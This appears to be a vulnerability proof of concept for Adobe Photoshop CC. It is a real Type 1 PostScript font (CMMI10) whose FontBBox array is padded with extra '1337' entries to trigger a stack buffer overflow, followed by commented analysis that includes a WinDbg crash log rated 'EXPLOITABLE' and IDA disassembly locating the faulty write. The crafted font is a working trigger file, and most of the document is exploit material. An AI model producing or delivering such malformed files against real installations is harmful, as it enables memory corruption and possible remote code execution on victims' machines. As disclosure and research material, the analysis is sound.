%!PS-AdobeFont-1.1: CMMI10 1.100
%%CreationDate: 1996 Jul 23 07:53:57
% Copyright (C) 1997 American Mathematical Society. All Rights Reserved.
11 dict begin
/FontInfo 7 dict dup begin
/version (1.100) readonly def
/Notice (Copyright (C) 1997 American Mathematical Society. All Rights Reserved) readonly def
/FullName (CMMI10) readonly def
/FamilyName (Computer Modern) readonly def
/Weight (Medium) readonly def
/ItalicAngle -14.04 def
/isFixedPitch false def
end readonly def
/FontName /CMMI10 def
/PaintType 0 def
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] readonly def
/Encoding 256 array
0 1 255 {1 index exch /.notdef put} for
dup 11 /alpha put
dup 12 /beta put
dup 13 /gamma put
dup 18 /theta put
dup 21 /lambda put
dup 22 /mu put
dup 25 /pi put
dup 26 /rho put
dup 30 /phi put
dup 58 /period put
dup 59 /comma put
dup 60 /less put
dup 62 /greater put
dup 64 /partialdiff put
dup 65 /A put
dup 67 /C put
dup 68 /D put
dup 70 /F put
dup 73 /I put
dup 77 /M put
dup 85 /U put
dup 86 /V put
dup 100 /d put
dup 101 /e put
dup 102 /f put
dup 103 /g put
dup 110 /n put
dup 112 /p put
dup 117 /u put
dup 118 /v put
dup 120 /x put
dup 121 /y put
dup 122 /z put
readonly def
/FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def
/UniqueID 5087385 def
currentdict end
currentfile eexec
D9D66F633B846A97B686A97E45A3D0AA0529731C99A784CCBE85B4993B2EEBDE
3B12D472B7CF54651EF21185116A69AB1096ED4BAD2F646635E019B6417CC77B
532F85D811C70D1429A19A5307EF63EB5C5E02C89FC6C20F6D9D89E7D91FE470
B72BEFDA23F5DF76BE05AF4CE93137A219ED8A04A9D7D6FDF37E6B7FCDE0D90B
986423E5960A5D9FBB4C956556E8DF90CBFAEC476FA36FD9A5C8175C9AF513FE
D919C2DDD26BDC0D99398B9F4D03D5993DFC0930297866E1CD0A319B6B1FD958
9E394A533A081C36D456A09920001A3D2199583EB9B84B4DEE08E3D12939E321
990CD249827D9648574955F61BAAA11263A91B6C3D47A5190165B0C25ABF6D3E
6EC187E4B05182126BB0D0323D943170B795255260F9FD25F2248D04F45DFBFB
DEF7FF8B19BFEF637B210018AE02572B389B3F76282BEB29CC301905D388C721
59616893E774413F48DE0B408BC66DCE3FE17CB9F84D205839D58014D6A88823
D9320AE93AF96D97A02C4D5A2BB2B8C7925C4578003959C46E3CE1A2F0EAC4BF
8B9B325E46435BDE60BC54D72BC8ACB5C0A34413AC87045DC7B84646A324B808
6FD8E34217213E131C3B1510415CE45420688ED9C1D27890EC68BD7C1235FAF9
1DAB3A369DD2FC3BE5CF9655C7B7EDA7361D7E05E5831B6B8E2EEC542A7B38EE
03BE4BAC6079D038ACB3C7C916279764547C2D51976BABA94BA9866D79F13909
95AA39B0F03103A07CBDF441B8C5669F729020AF284B7FF52A29C6255FCAACF1
74109050FBA2602E72593FBCBFC26E726EE4AEF97B7632BC4F5F353B5C67FED2
3EA752A4A57B8F7FEFF1D7341D895F0A3A0BE1D8E3391970457A967EFF84F6D8
47750B1145B8CC5BD96EE7AA99DDC9E06939E383BDA41175233D58AD263EBF19
AFC0E2F840512D321166547B306C592B8A01E1FA2564B9A26DAC14256414E4C8
42616728D918C74D13C349F4186EC7B9708B86467425A6FDB3A396562F7EE4D8
40B43621744CF8A23A6E532649B66C2A0002DD04F8F39618E4F572819DD34837
B5A08E643FDCA1505AF6A1FA3DDFD1FA758013CAED8ACDDBBB334D664DFF5B53
95601766776D4F09024EFFA59E6176AFB1FCA154B3072BAD4FAD58611DC4B5FE
4721C679FD0C9063A7BF16271BA4CF88836178B315E214AF2E76F4ED9EBFB02F
B3C30D8F9F808B3F10D07C1C026C616BA3BAF6EA02CD9927FC4989F34D38C5CF
B92F377658A321DFA315C68F3C463DC43A121AE6697522A243577EA2458E7A3E
50AC38BB2E65435F1C3C311B913C770B51CAFDE0071F399D0959D114BCC91997
F5136F6EABB32E1A435FB41F6B66C0B2C43882130630853AB9DBAFA018613B1E
8E53108F13C412AE5FDF5AE811328D61E0C1C23D0444C22690AFF5A4AFA2B0E3
36346A889395C7EF5777D9C5D2C22725A7AF54C83E0DAAD2CFFD74BBA7DC3E97
B6796437DE4E5569DFFAA1C0606E1AA3F0566423EE321E796057C7158872F6DF
C7BD781403B42FC231A40A5809F20DF2D337D2AEC64782702CE4063FB4FE1CBF
F64C03A73EA8625C9128338FB33E1B34562A74C7E302498FA354ED12CDF0955A
502F41AB757B4702D56EC0997D6F98EF5443FE6602210ABAC3A9FCD64349A179
7D1ECB8E55BABC40E53772DB6E58D85885FAD1A1497A32D7D207CE19F798EA0E
EAD9F4EDCA1EC761B5A0D8760B8C4F3662261BC429928C8F88970DD32A557B8E
E49502689ED399250B6C012D4432BFA199FF2737DEE17AA1E32BD23E40887516
F9A848EDD36EC34B8522DFAD0996CCC9557839E16F06F345CD3575BFC8BC6BE6
6F5A1BF8CC94DEFD461EFCB02682BB95CC7ACE3FA52740F371D7EB9CA00A72F9
3DC5F5186517E36EBED8E26D9639265887276FC555C55D1855175888FEB29D0F
D54A05DCEBC8D1B423E0D983498F13851E6AC1A4AA0F374E2EBB0F671F1AA1A8
6A928816724CC9EB0A32F867D720BE7E0063B0CE205D51CF9916A36B9FEB3321
61EDD65520211F3DA17974A7DBB8FFBAAE6ED30516A985328837E5BCDADE6DD3
3966EFF786B5D0EF721D73501E3C7B575739C2A83863FEEA2763CFA8F21F42BB
8EF9075EA5902DF84DC019D818182AC0A5B1AEB6E575917953D22CC57D655142
63ED835BC8BFE7024C4DFDD441B7DD937AC1E884459F71436809079DF4FF6471
CD92BB75068ECE0379DFE2DA66A52CE74A875B1A3EBC3429E94C20F5C372809E
0751B3DA252B4BCEDD402F1EFC10C5C22C642F6C82C091D58A0F212BD1F6AC5A
544F5712FF4272B90C80F18003A83164F676D7248A5B11A8769BED8D8D535B8F
A3346942A4FECF593795F576329EC7DDF79E53FDC52AB909336957FB2B3DBB23
F605780047C55B0BE6A6F6F0A58670641CD809E23040EC8940E8CA6B309733F0
0D06CCDB2DF7F48CD902B7BE149E7C5F73081851BF8C1EFC945D4CCF5D7DD685
B98E9E4D6F16A9F74CE384A39A63B9EB386442FB18E1D39906579CE42B942189
060367EE51DF6342993E68B90F506A7037A2B548B25CE07AA0B2D3132F1EA0B0
E2BBF3DAA9F9D0A156C28C333C85392556A1B4679326938B12128D35134245F6
F271C1B858E17D0FEB0E99B659121B3CC0FA3A7FA1E6DFF4B4F5337D1CC84067
11EB01A0CDBA65913A507D1604C8482B949F4A71EA4735323254184367FB68B3
B9A3AC611C0B62C4C97A1007B70F3019F62F164D22C419540222E8D033C7F628
115B031F2E7EEF8AEBB7D520EF6D1C61CA2505E16B4855AEF44955E1A4617E92
0CB97633A6F7362E65A3C04BED154AF88E3A6D64960BC019B8F1FB107D7904A8
2FD80DA6F6A857391DC28231BC0EE4AFEED8170CDF8F9B4B77829205BD5CA122
58EB0FD25CC99CEB8BFE56A69FFD22362BDD2634B39FBD96901F1C123392272F
05FB33298D44B8E416A12BC5B53173048C32BFF6F29C3BDC4213988044A908C9
6B9A1ABA9C052C4DD57AB177C3F5692D438C73D292DF33BC87428F982ECF4DAA
5C6399FC9B62A48B6878425CE558BF2A302B91D26D213E8BA528C3452A7E1F06
643933DCAF5D4EB1429B229EF61BE9C76F1EBC051CA010E3A4FE26D1F855B022
F0285B91C35504FF12FF98E3DE08792274788B6993C1459A0164F6C31283B43A
B618055F526AF15C85FF493EDD36DF6B48AAEB2EDBF509580D147B4BB615814A
BB0A080890BF112C295C04D99EB9D3F257B2DC63023DAB01AC9437F2D6025ED4
84FEEC7AAD1D77E0D3CD6ECA6EDD92FF5C9EF7C7916F04688EEB42A4ED977F71
D590F50D7BF5A76AEBBD65DFD00A8FBEAFB269A76994E10F2FC09EB34E017040
2A56CDDDD39E7A9FDC5814ED74469C55B215B72824FD598221776781EC6E98EF
6511319BEF631C5E21343D9B44AA12A56B326FF62405C146B50C0D8C13CAE9E5
514E9192B048E2AD6E638A6BBA54407F2876E3A2EC9A37BE5A35309D8CCE9E47
272B140706E9BCA0C21F38BF77A5BD2B5BFB6FED766B87D311E86A9AA011ECF1
906C8745F3CC14C79453EB5E2BDDB347F3B1DFD0DFC3BAE0F71707933221F95D
9CFC22E71B8863B5F79487D0EA516FBDBD8B7AB8815D6B0928969610186DE799
020A0B1784AEF18E5203ED3C6BE2157FD93A4DFC703C5737F484B9E7E3264DFD
A7962CC849E0AA847866EDF8C4693C9FA53C7AB90C76EDB5988BE2AAE637D4B7
390E6FD502C5F89AEC3B7FAF59D986B336FD3751F2B29784D22D7C99190F913F
9263123EC9A3DE68B2993CAD3DAAC25B677A11D1C4491388DF0F41ADA0B57FA3
63486027C0F91487D827C28AEB37902CA7A823C0D8761F4E072DEECD0F6399EC
0F9E8CDA826915F3A874F90ED0317D89E083925949A7A8BA2A3DA3429F102192
0CCD7F04CCEF77E05ED8DEA13B1660D5B27341E54336F800E7D91EE3F6260556
6A89A00BC302C9F1DB453C2EECDBB83FF01B31590684C6AFEA1DB2303200DA22
3C5FF42DDB3909902F136E5B1FC36B1546EBE35F61B3ADF2942021B82422A816
BAF81FF8EBD36E930F46FEE018B66FE1DF68411DE51606DC9612D84445D99080
1C6EC632D71E8A7742F4C434BED02D039A144BBB85D96D994F224EBAFA3CB681
C9769B944B142C44B3523955393ECF3A76B432D9E6A7B724425D5CBB32C83219
A9BA3454C6EF6529A5D86DC2965DD2972F68DCA73891F5A7347CD9D60581415E
762FC3F51D7DD5E8FADCA307859F22099EBC2C0DDA7C72FF9FB047151B9A5230
5D883DC944B5CBB1B476FB9AE166B8D76B1CC0F4192594B552F5DDF187C70F68
19E8B302FB48A99F8782BEA0B72BCE2CEBDEDB0EEEB7C409E2439932E9D6B554
38D6A9FAB99F70064612C512B02FF9E3A40DEB6B5DF2B054A583E4F1BA085974
803F59927818E6D29465F5AF3D14396FE3C161523BB7992F70DC85E047425828
F099A652BC5598A5925568D96023F83A8190000F4D420FE25CFEABF008487F0E
55D6B4415ACFF920D810BAD4B4C0F4F2F5A5E83C7AE50A942FA0092F03301739
C5DA47D39B4D7E1FA16AC67D4C1231CE8159145397A129B2166BCE09E4307C25
3BD05756CFC9488F4EBADA907C66FE06820BD36ED8FA50EBE291C40630B28F37
9EC9001E847C48F4EAC0B5364EC61863CCA30B9BF541AF3844F44F24E9B5A91F
D459BC9E61EBFE040F29263E81D25ECEDF9992C58B008F8596F777B95E326C9D
4391F49F0BB65A8077950A2A0EB59C73BB183C056458642158514EF13EA65B82
2BC164ABE1966AEB3014F76C7F25D1E312D614B3F6357E6D956304E1DC5121FE
97B99E88483CF579916DAD9BFCFC12090F23C1CC67BC61529E097995435F43EA
94E1D5753E8D33946148D9A966356A89550439F8E15AC75AFA8BBDA4810BF57A
7B98CB8DF0DBADB5E7C014E3F65F3C8DA035E7CC10CFBA4A6885ED72EEA5D298
11D25FB508997A4CFF88CFD15A958D93AFE2C59FDB2B35F45B08D9AA58B56412
571789F2F8D428727F1A68169387A331236C059FA778EBF87D54C97DBA99EAF1
E676A60FF189E43AD665653DA394032EF4833DC62A3BFC4B617A01E06B204440
E16942FEB1299D4B7CA68DF0DF6612256A1EFE17875D2568F19F0490BC92904A
EE6B6D0F3B8D8854BFC42AAC19FFE981E6F2518718A32242A0011CD1F7BB99F2
06A895181987934B7E25A53E509E2AF034C7389DF733C2F011623E1D797AE264
AC0DC7A6DA91876F5019FD9650EA3DE1FC9DEF4285E535EE9310355450F7E465
2967CCDCCEB70F5CF237275FE7B509F208024937F61B2985F7E1C24F34FA540B
55B7237CE79AF6B90E1C481D4D8639AF514C945F40572E70BC88E07552857807
7C91CFFED2C4D4EE5C054A8C9E35AF6216AC7F127B5A4C4B871BF27F06166820
37D4972502DCC662FD5D98037B3251ED782C9448AA3B2AF8099541B927B35401
E3A2D1D12336C049784A3F1F30169FE473E4F2D5E03124D6F13E4E06367D2FC9
5FE9886A0C9DE7655AD9AC2F2B8F43002FD2B41A8D8FA2D7B8AAF2BD6E54AE94
C6D24CFDBA23AB82A9905F80CEE259EB52A3F62026E862D35C1939190427CC6B
FE92985C53273501683BB0B2AB312FF4BF42E7D7304F45DBABC19B5BFC73BF6C
E4EE7408CF574EC875279D9BBC0B4ED8B7A495C28D5AE530C0C76E9AA4F9B8E3
234DCC414B97213A63CA6293E3E3F9864EDEE04A2DA00A6628A41480DE82AE8B
22AF0C4E442B07D7B9BFBC5ED574C86DC774C9D21D9A54F2AD2231F62E35ACCD
5B564AFB52EBFF773124311B4F83A487199BB74D2F8F22A9D8E4FAD5C0E4D0C3
953CF05C519AF3A50F8F85B2B17BEE0EA8B6D068B37B0C5DA517440E55FE08E2
B16B18D5CBD86B7FB4F208F8B7420AB30502B15EBCCF5CFA4E6F01CB062FB817
1198F19F80FF084A48A9A946E20C415F73F20DB21A71902536BCDE24D0CBAD77
16D9B3C24492FB516A77BC1D55DECD497EBC1439BE4A5A38A9D9925571233213
B5632D52756153D6777282A3303BC9776BBEF1A9F36FC184057531102E18BE77
9B524ECC856DCC6B4C15857B1108C06C5B82D1490096C1E87EEF58B9F4A2BD93
5EDB3BCB50A429F05AFFC4E0EFFF5B15058E1B8CA0C9B7D2EB8F2767234A7DD8
B527E2947B942017897E7A42053DBE4473532F57D1510DDEB688CCB9AF2F12EA
107C309E5C9A73E2C4C35193A5DC3268B80374CE36B9157DA49AFA73CE80673D
6DCFB540F6827C1E7105B4BD29C431FA781DDBF43FE7A6F1AD554B0ACE1F6DC4
37779B83CC8A7E921AFC2D9064B50375A59F8DA19DCAFC1E70E2BCF4E81D58BF
116657D199174B411D88FE6A41A9A9ED1AA6FAB9591F74F69DA6447A076E887F
8955F24164C30A897993682B067DF80BAC33D71C80A600893CA17149578DB558
83A7697357FAE2B131E094576638C8B9CDAA0A7E7842F07B23D8034940491005
D38F29443FFF0D9207A33B52AB5F520B543EFBAED92E8C1B59D04F3323EA4130
3F40CBE99A5CC7EF434408926D652EDD716CFF362D3F2156761154C2C39F515D
F26C1B55A58664026B71A4D66465189815CDA838D6147047096BC39DD5BAA3F8
5176DEE7C21742A862554DFDDFA1DF580D7E8C6DFAC12AF5800CB3706C75D303
61A000D1711E940897170248272903CF558A3B9EED332688E5D8EF3C9EFA3B3F
905AD4B17DA41C12FE946FAD2AA9A86A77D23CFE6803ABA70C3930D04E8F85BD
D3D579205094FECC8CD28914073DF874017E59320F25E4719F0E7511F893FF38
7CE056055CD3DA069BA13E0674A4DFD17ABDB2544B306DE54E4FA0CDE5691385
4F727AD76B04096D71B65B9E0FF6224B4C8AF185D040409A0DFF89FE13A5594E
CCC593A8689D874199F669DA127BBF70DBE4424B94C810F843773BE522EBE845
7558E59ACAFF17F1168D14339C6C9CA399251ACD0AB723A38DDCD69B01477004
BBBA575044CCBA1477D9DF8E0EC834C0E2882D7138A7ADCF73C2AD284037716B
F31144CB8FAA4E33B822B903051BA236705926A7038E9E1EBDD5E21D5CFCAB54
A83CC6764ACC0AD8496171E05DD0A5896B73576071613F883A995991FEDABCB2
2ABCB59DAB634426AC405C045A28893547039989419BCE2EA708BFAA12697950
8F39C032BFCCDDD98AFFE165E46C86BA87898118F2119EA64CC87FED3E796784
B12A11F54EC6ADD7C51A2C92EEB0FD26AC7281C9175A92CF75BB6A8DA3EAE9B1
49818CE6136319718B88EEA0B7806767E93C19781F9A9DF64C8E81AAE85CDB76
FB5495BED3AC88DDFA16859A40CE8CA8DEA4493648D34A1350CE9086CA5A2A7C
0AF66A6876D67D465F16DAA74D241B80384C18611AE0CBF6041412DA0BA41AAA
CB9C2ED3FB0F085A0624BC0EC6D85CDCD0001BE6C617742592648D22905387E0
C167E293199E781E7E09D39C30D2DDA89A80E016E2BDAFB4EDB25044E8B7F0E6
A1F3F063C9D00843F00263A6711349A4D99D8D75DC852C76ADFF27E2E40643AA
F92BB033FC966C7359C2514C10E287EEBA8916C35F363008F8C1363AE7D7802E
7AF2E4D8E957C81839A368F93D336595DD2DEB11D546F042E8C21F0605B7545A
CE368069FB9726D1F977AB2ECF4BA189CEA5F1293CA87CC565CEC82923D30AE1
5B38E1921B2AF3106E586AA9605A1EB85224EEC3247F9B65AE7B9610197B0103
844F1E75E340963974F2EDEA1C1478483E8FE221D2DAD0F881BA6B4E8AEC083E
CA2CAA72767BB6A32FE8E209DECB743510677954945A79D458B921786CAA6FBB
AA1122145FE19A650D8064D5560C8AA267F6E285638AC2B345B074B4A68FC935
7BCF6DB898249A703323CF4D1D18D0B01ABF64FF8A562BDE28A9B65D70297EA2
38ED03F1E6EFC7F87AEDEB09B329BFC093390A840DF50E6CCE0EA6D124919B16
6BFF042944CC8040045EE709292CE98C591D71603FF263FBBAF408488F5A734A
A01218D8936863745FED46C5285B25D7306E52029464FFCFF9502AE8E6248A8B
6F8CDAD5FCD5C961890E2350176B00E1E34F42C136D6F2CF1F69F2A79AC5B630
18A61F259FA7689DD0E32DD6415E70D5728192015F94DCDDE14F859BBC120543
DC625507D3F2098275D87C431312C437EA611D822AF090E647FC1AA949A150F3
6FBEC872DCB2756AAA2D5791B3FCEE1E52D2E8D177C3E69BD6E55F1FC285B1E9
319D48B687AD658DCA06D6CA16F7D192A6E89EF4CC741550187C5B1360C5917F
E993D4A32F299F49C0FDE38E518C2D93AC970D40165F29F6A42AC3AEEBDDA6CA
DD860CED28678B01DBFEBBA7532935779C9CAADA665239134CB421D16F4D24B1
486E4F4946CCE1FB5D8994ECB3F2FB853D427D7979F2D1D6CA1653B6EBE32064
AC12A858EDA4036B843B1C79B300AB5B6560E8E838ACE3F49240918035F2FE1E
62A233DD1B911F1C7D551AF5257A21BF66885417A2BFD24B06B9601303BFAA3B
7281F95C8B40B67FB77626A4EA87248551F3E2B001CDE9BFBEFCC730E1E18D48
43532F155E276BF9A7CA8407F5FF84A264FDFA49DB9D495BAA53CC65F765CAE0
8ED159C596B94077ABC413DA4472398DE11B17129811CCAC2BA48668F64A0243
E17A9D0812A4BD5E38DF12BFA2838E66A17FB87F20D46CC17C562F8DC1023C5B
714D85277B4D9FFB71EC008CC41A16A098DDE8F9DCDADDF14A3F4DAD8657B7A9
201846536E41B9934FC8633A65A849B820FB2E51EE1CD6F53A50E0023139D987
809C492E5BD3B3879B8A7543F1C4CA7972B88E45EB94BF8085E0C0CB5EA1D204
61DA73DACFDE4CC741119564936D651D0A0B790078C4B229F776C0CBF217CC7B
08C18E399DDD846773CB5B9F7A1F39DF6EF5B83D85718F162B577D4279E05856
0774CEF8E47C5EA77AC016939330FA1A51E1E2E100A9665A1DDE8410DD413745
0F5244B940250B61830480E8F563FBAA6E4CB2DEFC82162B1A8C09A5D3F470AF
959558B7B075E951332B53A2069070880EC3040DE22159F9B6F48355C1B2D270
CFA741C46C218D62C04D54519224A485742979F50BD45011E05F04E2F594CBED
1B0D411A7D2587870C6FDCF7AE4D1E408BF6B66D6B826A427BECBEF55D82DDDD
50FFF1C1962D6F2D81FB050B60CC6AA74B7292A16426CBB565615BF60A881A9C
9DB9A8FFD937F8B0EFCB0F992927FC59B78B45C545CADE2A54791E3DBA3E9F0D
B6BF14499D4C0C758CBC09037AD3828689404005FA2DD419343EA6EC91128B61
4C5DA0B792FDCC0B248D5853BE2E1EB9A51418E32119B35332A3A714A13A2E3A
390B24D212B070338F3F0F240E5F8864242741EAB379B90966DE283524DE1D4E
91F6FA3128AE5485837F8949CEBE18A51CE9AB4479B98D226A735EAF763E7FE2
732205EACFAB5DC84E57D6788178A88ECB99D69520FA5271B04B5C8497FD3992
B207D771E7BF8E3AECCAE0C723162344AFB005B4EAB4E92A9ADDA0A7542FAE67
09E022138177A1229FD4B62B987CE1E70DD0F904DF6A46FC4C09A703B873507E
C931B366EDC69DA8401AF65333F2168458CE140303DC56E25F5B516C64798977
FEC0CC3F07CD63AF3C46156C30A1D36FEF6CFBC31FFC4B49016DCE533F925D3D
50AB23AA654B70139D87BFDAF13B810D4EA6AFCC857259D25C8B4A3C02B57380
2BEEFAA6C1856F93BE103A2097591F5E19552ADA91C34C7BF4772935995252A2
2E0D6A6BA227BA050ECB30AE857DD6DA3963D2E10E5873FB5E8D9A9FFD642621
3BBAB4058D700FE50E4B012C9AD470EF0198CFDCFCC6191EEC3C26E97B901E2D
1CA5B455D0EE03F7E09735D5947528D3AE28063734D399ADB94D42532E906D7A
7E23EDB3B94A88D595209CA6EE0ECD896A1F23FB7EC5EA1E2B44874A9E6CC09D
5FDDE84B57A5F26893A11D5A56567F5589711D12FBBD0FDABC04AFBE382F24AF
094B1ADB336FCC8F6D6BE86E8A03CF4351C57AA513382FA1BA91A24E55F2CC16
97AF3CFD1EFBD4E111090D1FF0E4270F7182BD191D289C53783F05156FE4ACEC
9C7E9D4467ED6852E4D897AC05AA2FAA72ED0BB01DF92E9257BAEAC5E19F80EC
C24783BE097FC3A9B36D87806B5E9F304622FFC6A7F9B553381EEA0607AAFFCF
1322085B99B8D899A0176557103EDF0BBB5368470680E73132E13F8ABB509F2B
EBA0C0F7F10774225FC75D1B2874F9330C204EDEC05240519C6F71C871C6535D
6CF8A3B3F785961747130EFA5711B59BE7F459CA09870794DE44D32E1305591E
EAC44E3BF81642ADDE6B866A3B8E90B067BB2B45F85AFF8F9211CC300F2DFCF0
B973741EEA854E
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
cleartomark

/CMMI10 findfont
12 scalefont
setfont

newpath
50 700 moveto
(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%%^&*()_-+=) show

showpage

% Adobe Photoshop CC Type 1 Font FontBBox array Stack Buffer Overflow Remote Code Execution Vulnerability

% Summary:
% ========

% A specially crafted postscript type 1 font file can trigger a stack buffer overflow via a crafted FontBBox array. 

% Analysis:
% =========

% A large FontBBox array can overflow a stack var and lead to a stack based buffer overflow. In this example, I supplied a poc with the following:
 
% /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def

% Debugging:
% ==========

% STATUS_STACK_BUFFER_OVERRUN encountered
% (133c.850): Break instruction exception - code 80000003 (first chance)
% *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Adobe Photoshop CC 2018 (32 Bit)\MPS.dll - 
% eax=00000000 ebx=503aad2c ecx=77a2e4d0 edx=002abf0d esi=00000000 edi=002ac8cc
% eip=77a2e34d esp=002ac154 ebp=002ac1d0 iopl=0         nv up ei pl zr na pe nc
% cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
% kernel32!UnhandledExceptionFilter+0x5f:
% 77a2e34d cc              int     3

% 0:000> kv
%  # ChildEBP RetAddr  Args to Child              
% 00 002ac1d0 50126724 503aad2c 002ac50c 5012682f kernel32!UnhandledExceptionFilter+0x5f (FPO: [Non-Fpo])
% WARNING: Stack unwind information not available. Following frames may be wrong.
% 01 002ac1dc 5012682f 503aad2c 00000012 002ac224 MPS!MPSToAGMColorSpace+0x12274
% 02 002ac50c 502556ef 001b2493 45a2b7ec c2000000 MPS!MPSToAGMColorSpace+0x1237f
% 03 002ac594 5012a452 00000001 01002092 459948bc MPS!MPSCT5NewServer+0x7957f
% 04 002ac5e4 5012a6de 002ac720 00000000 002ac8cc MPS!MPSToAGMColorSpace+0x15fa2
% 05 002ac614 5012774a 00000001 00000009 00000000 MPS!MPSToAGMColorSpace+0x1622e
% 06 002ac64c 50352b4a 00000000 00000002 00000000 MPS!MPSToAGMColorSpace+0x1329a
% 07 002ac680 50352855 00000003 00000002 00000002 MPS!MPSCT5NewServer+0x1769da
% 08 002ac694 503532cf 45a0cc24 0000000c 00000000 MPS!MPSCT5NewServer+0x1766e5
% 09 002ac708 503537a2 45a0cc24 00000010 00000010 MPS!MPSCT5NewServer+0x17715f
% 0a 00000000 00000000 00000000 00000000 00000000 MPS!MPSCT5NewServer+0x177632

% 0:000> !load msec
% 0:000> !exploitable

% !exploitable 1.6.0.0
% Exploitability Classification: EXPLOITABLE
% Recommended Bug Title: Exploitable - Stack Buffer Overrun (/GS Exception) starting at MPS!MPSCT5NewServer+0x000000000007957f (Hash=0xe6ea5d40.0x979b8c29)

% An overrun of a protected stack buffer has been detected. This is considered exploitable, and must be fixed.

% Static Analysis:
% ================

% Since the stack var comes from sub_10165500, I'm marking the bug to be in this function.

% .text:10165500 sub_10165500    proc near               ; CODE XREF: sub_1012DE70+396
% .text:10165500                                         ; sub_1012F0D0+1FC
% .text:10165500
% .text:10165500 var_1C          = byte ptr -1Ch
% .text:10165500 var_14          = dword ptr -14h
% .text:10165500 var_10          = dword ptr -10h
% .text:10165500 var_C           = dword ptr -0Ch
% .text:10165500 var_8           = dword ptr -8
% .text:10165500 var_4           = dword ptr -4
% .text:10165500 arg_0           = dword ptr  8
% .text:10165500 arg_4           = dword ptr  0Ch
% .text:10165500 arg_8           = dword ptr  10h
% .text:10165500
% .text:10165500                 push    ebp
% .text:10165501                 mov     ebp, esp
% .text:10165503                 sub     esp, 1Ch
% .text:10165506                 mov     eax, ___security_cookie
% .text:1016550B                 xor     eax, ebp
% .text:1016550D                 mov     [ebp+var_4], eax
% .text:10165510                 mov     ecx, [ebp+arg_8]
% .text:10165513                 mov     edx, [ebp+arg_0]
% .text:10165516                 push    ebx
% .text:10165517                 push    edi
% .text:10165518                 mov     edi, [ebp+arg_4]
% .text:1016551B                 test    ecx, ecx
% .text:1016551D                 jnz     loc_10165621
% .text:10165523                 lea     eax, [ebp+var_1C]
% .text:10165526                 push    eax
% .text:10165527                 mov     eax, dword_10351CA8
% .text:1016552C                 add     eax, 670h
% .text:10165531                 push    eax
% .text:10165532                 push    edx
% .text:10165533                 call    sub_1021BA70
% .text:10165538                 add     esp, 0Ch
% .text:1016553B                 test    eax, eax
% .text:1016553D                 jz      loc_101655F9
% .text:10165543                 push    esi
% .text:10165544                 lea     eax, [ebp+var_14]
% .text:10165547                 push    eax
% .text:10165548                 lea     eax, [ebp+var_1C]
% .text:1016554B                 push    eax                          ; size 0x10 (4 elements expected)
% .text:1016554C                 call    sub_1010DD40                 ; stack overflow

% In sub_1010DD40, we see the following code:

% .text:1010DD80 loc_1010DD80:                                        ; CODE XREF: sub_1010DD40+76
% .text:1010DD80                 lea     eax, [ebp+var_10]
% .text:1010DD83                 push    eax
% .text:1010DD84                 lea     eax, [ebp+var_8]
% .text:1010DD87                 push    eax
% .text:1010DD88                 call    sub_10260BD0
% .text:1010DD8D                 mov     eax, [ebp+var_10]
% .text:1010DD90                 add     esp, 8
% .text:1010DD93                 and     al, 0F0h
% .text:1010DD95                 cmp     al, 10h
% .text:1010DD97                 jnz     short loc_1010DDA3
% .text:1010DD99                 movd    xmm0, [ebp+var_C]
% .text:1010DD9E                 cvtdq2ps xmm0, xmm0
% .text:1010DDA1                 jmp     short loc_1010DDA8
% .text:1010DDA3 ; ---------------------------------------------------------------------------
% .text:1010DDA3
% .text:1010DDA3 loc_1010DDA3:                                        ; CODE XREF: sub_1010DD40+57
% .text:1010DDA3                 movss   xmm0, [ebp+var_C]
% .text:1010DDA8
% .text:1010DDA8 loc_1010DDA8:                                        ; CODE XREF: sub_1010DD40+61
% .text:1010DDA8                 mov     eax, [ebp+arg_4]
% .text:1010DDAB                 inc     esi
% .text:1010DDAC                 movss   dword ptr [eax+edi*4], xmm0  ; stack overflow right here
% .text:1010DDB1                 movzx   edi, si                      ; edi is the counter
% .text:1010DDB4                 cmp     edi, ebx                     ; ebx is the # of elements in the array
% .text:1010DDB6                 jb      short loc_1010DD80           ; jump back into loop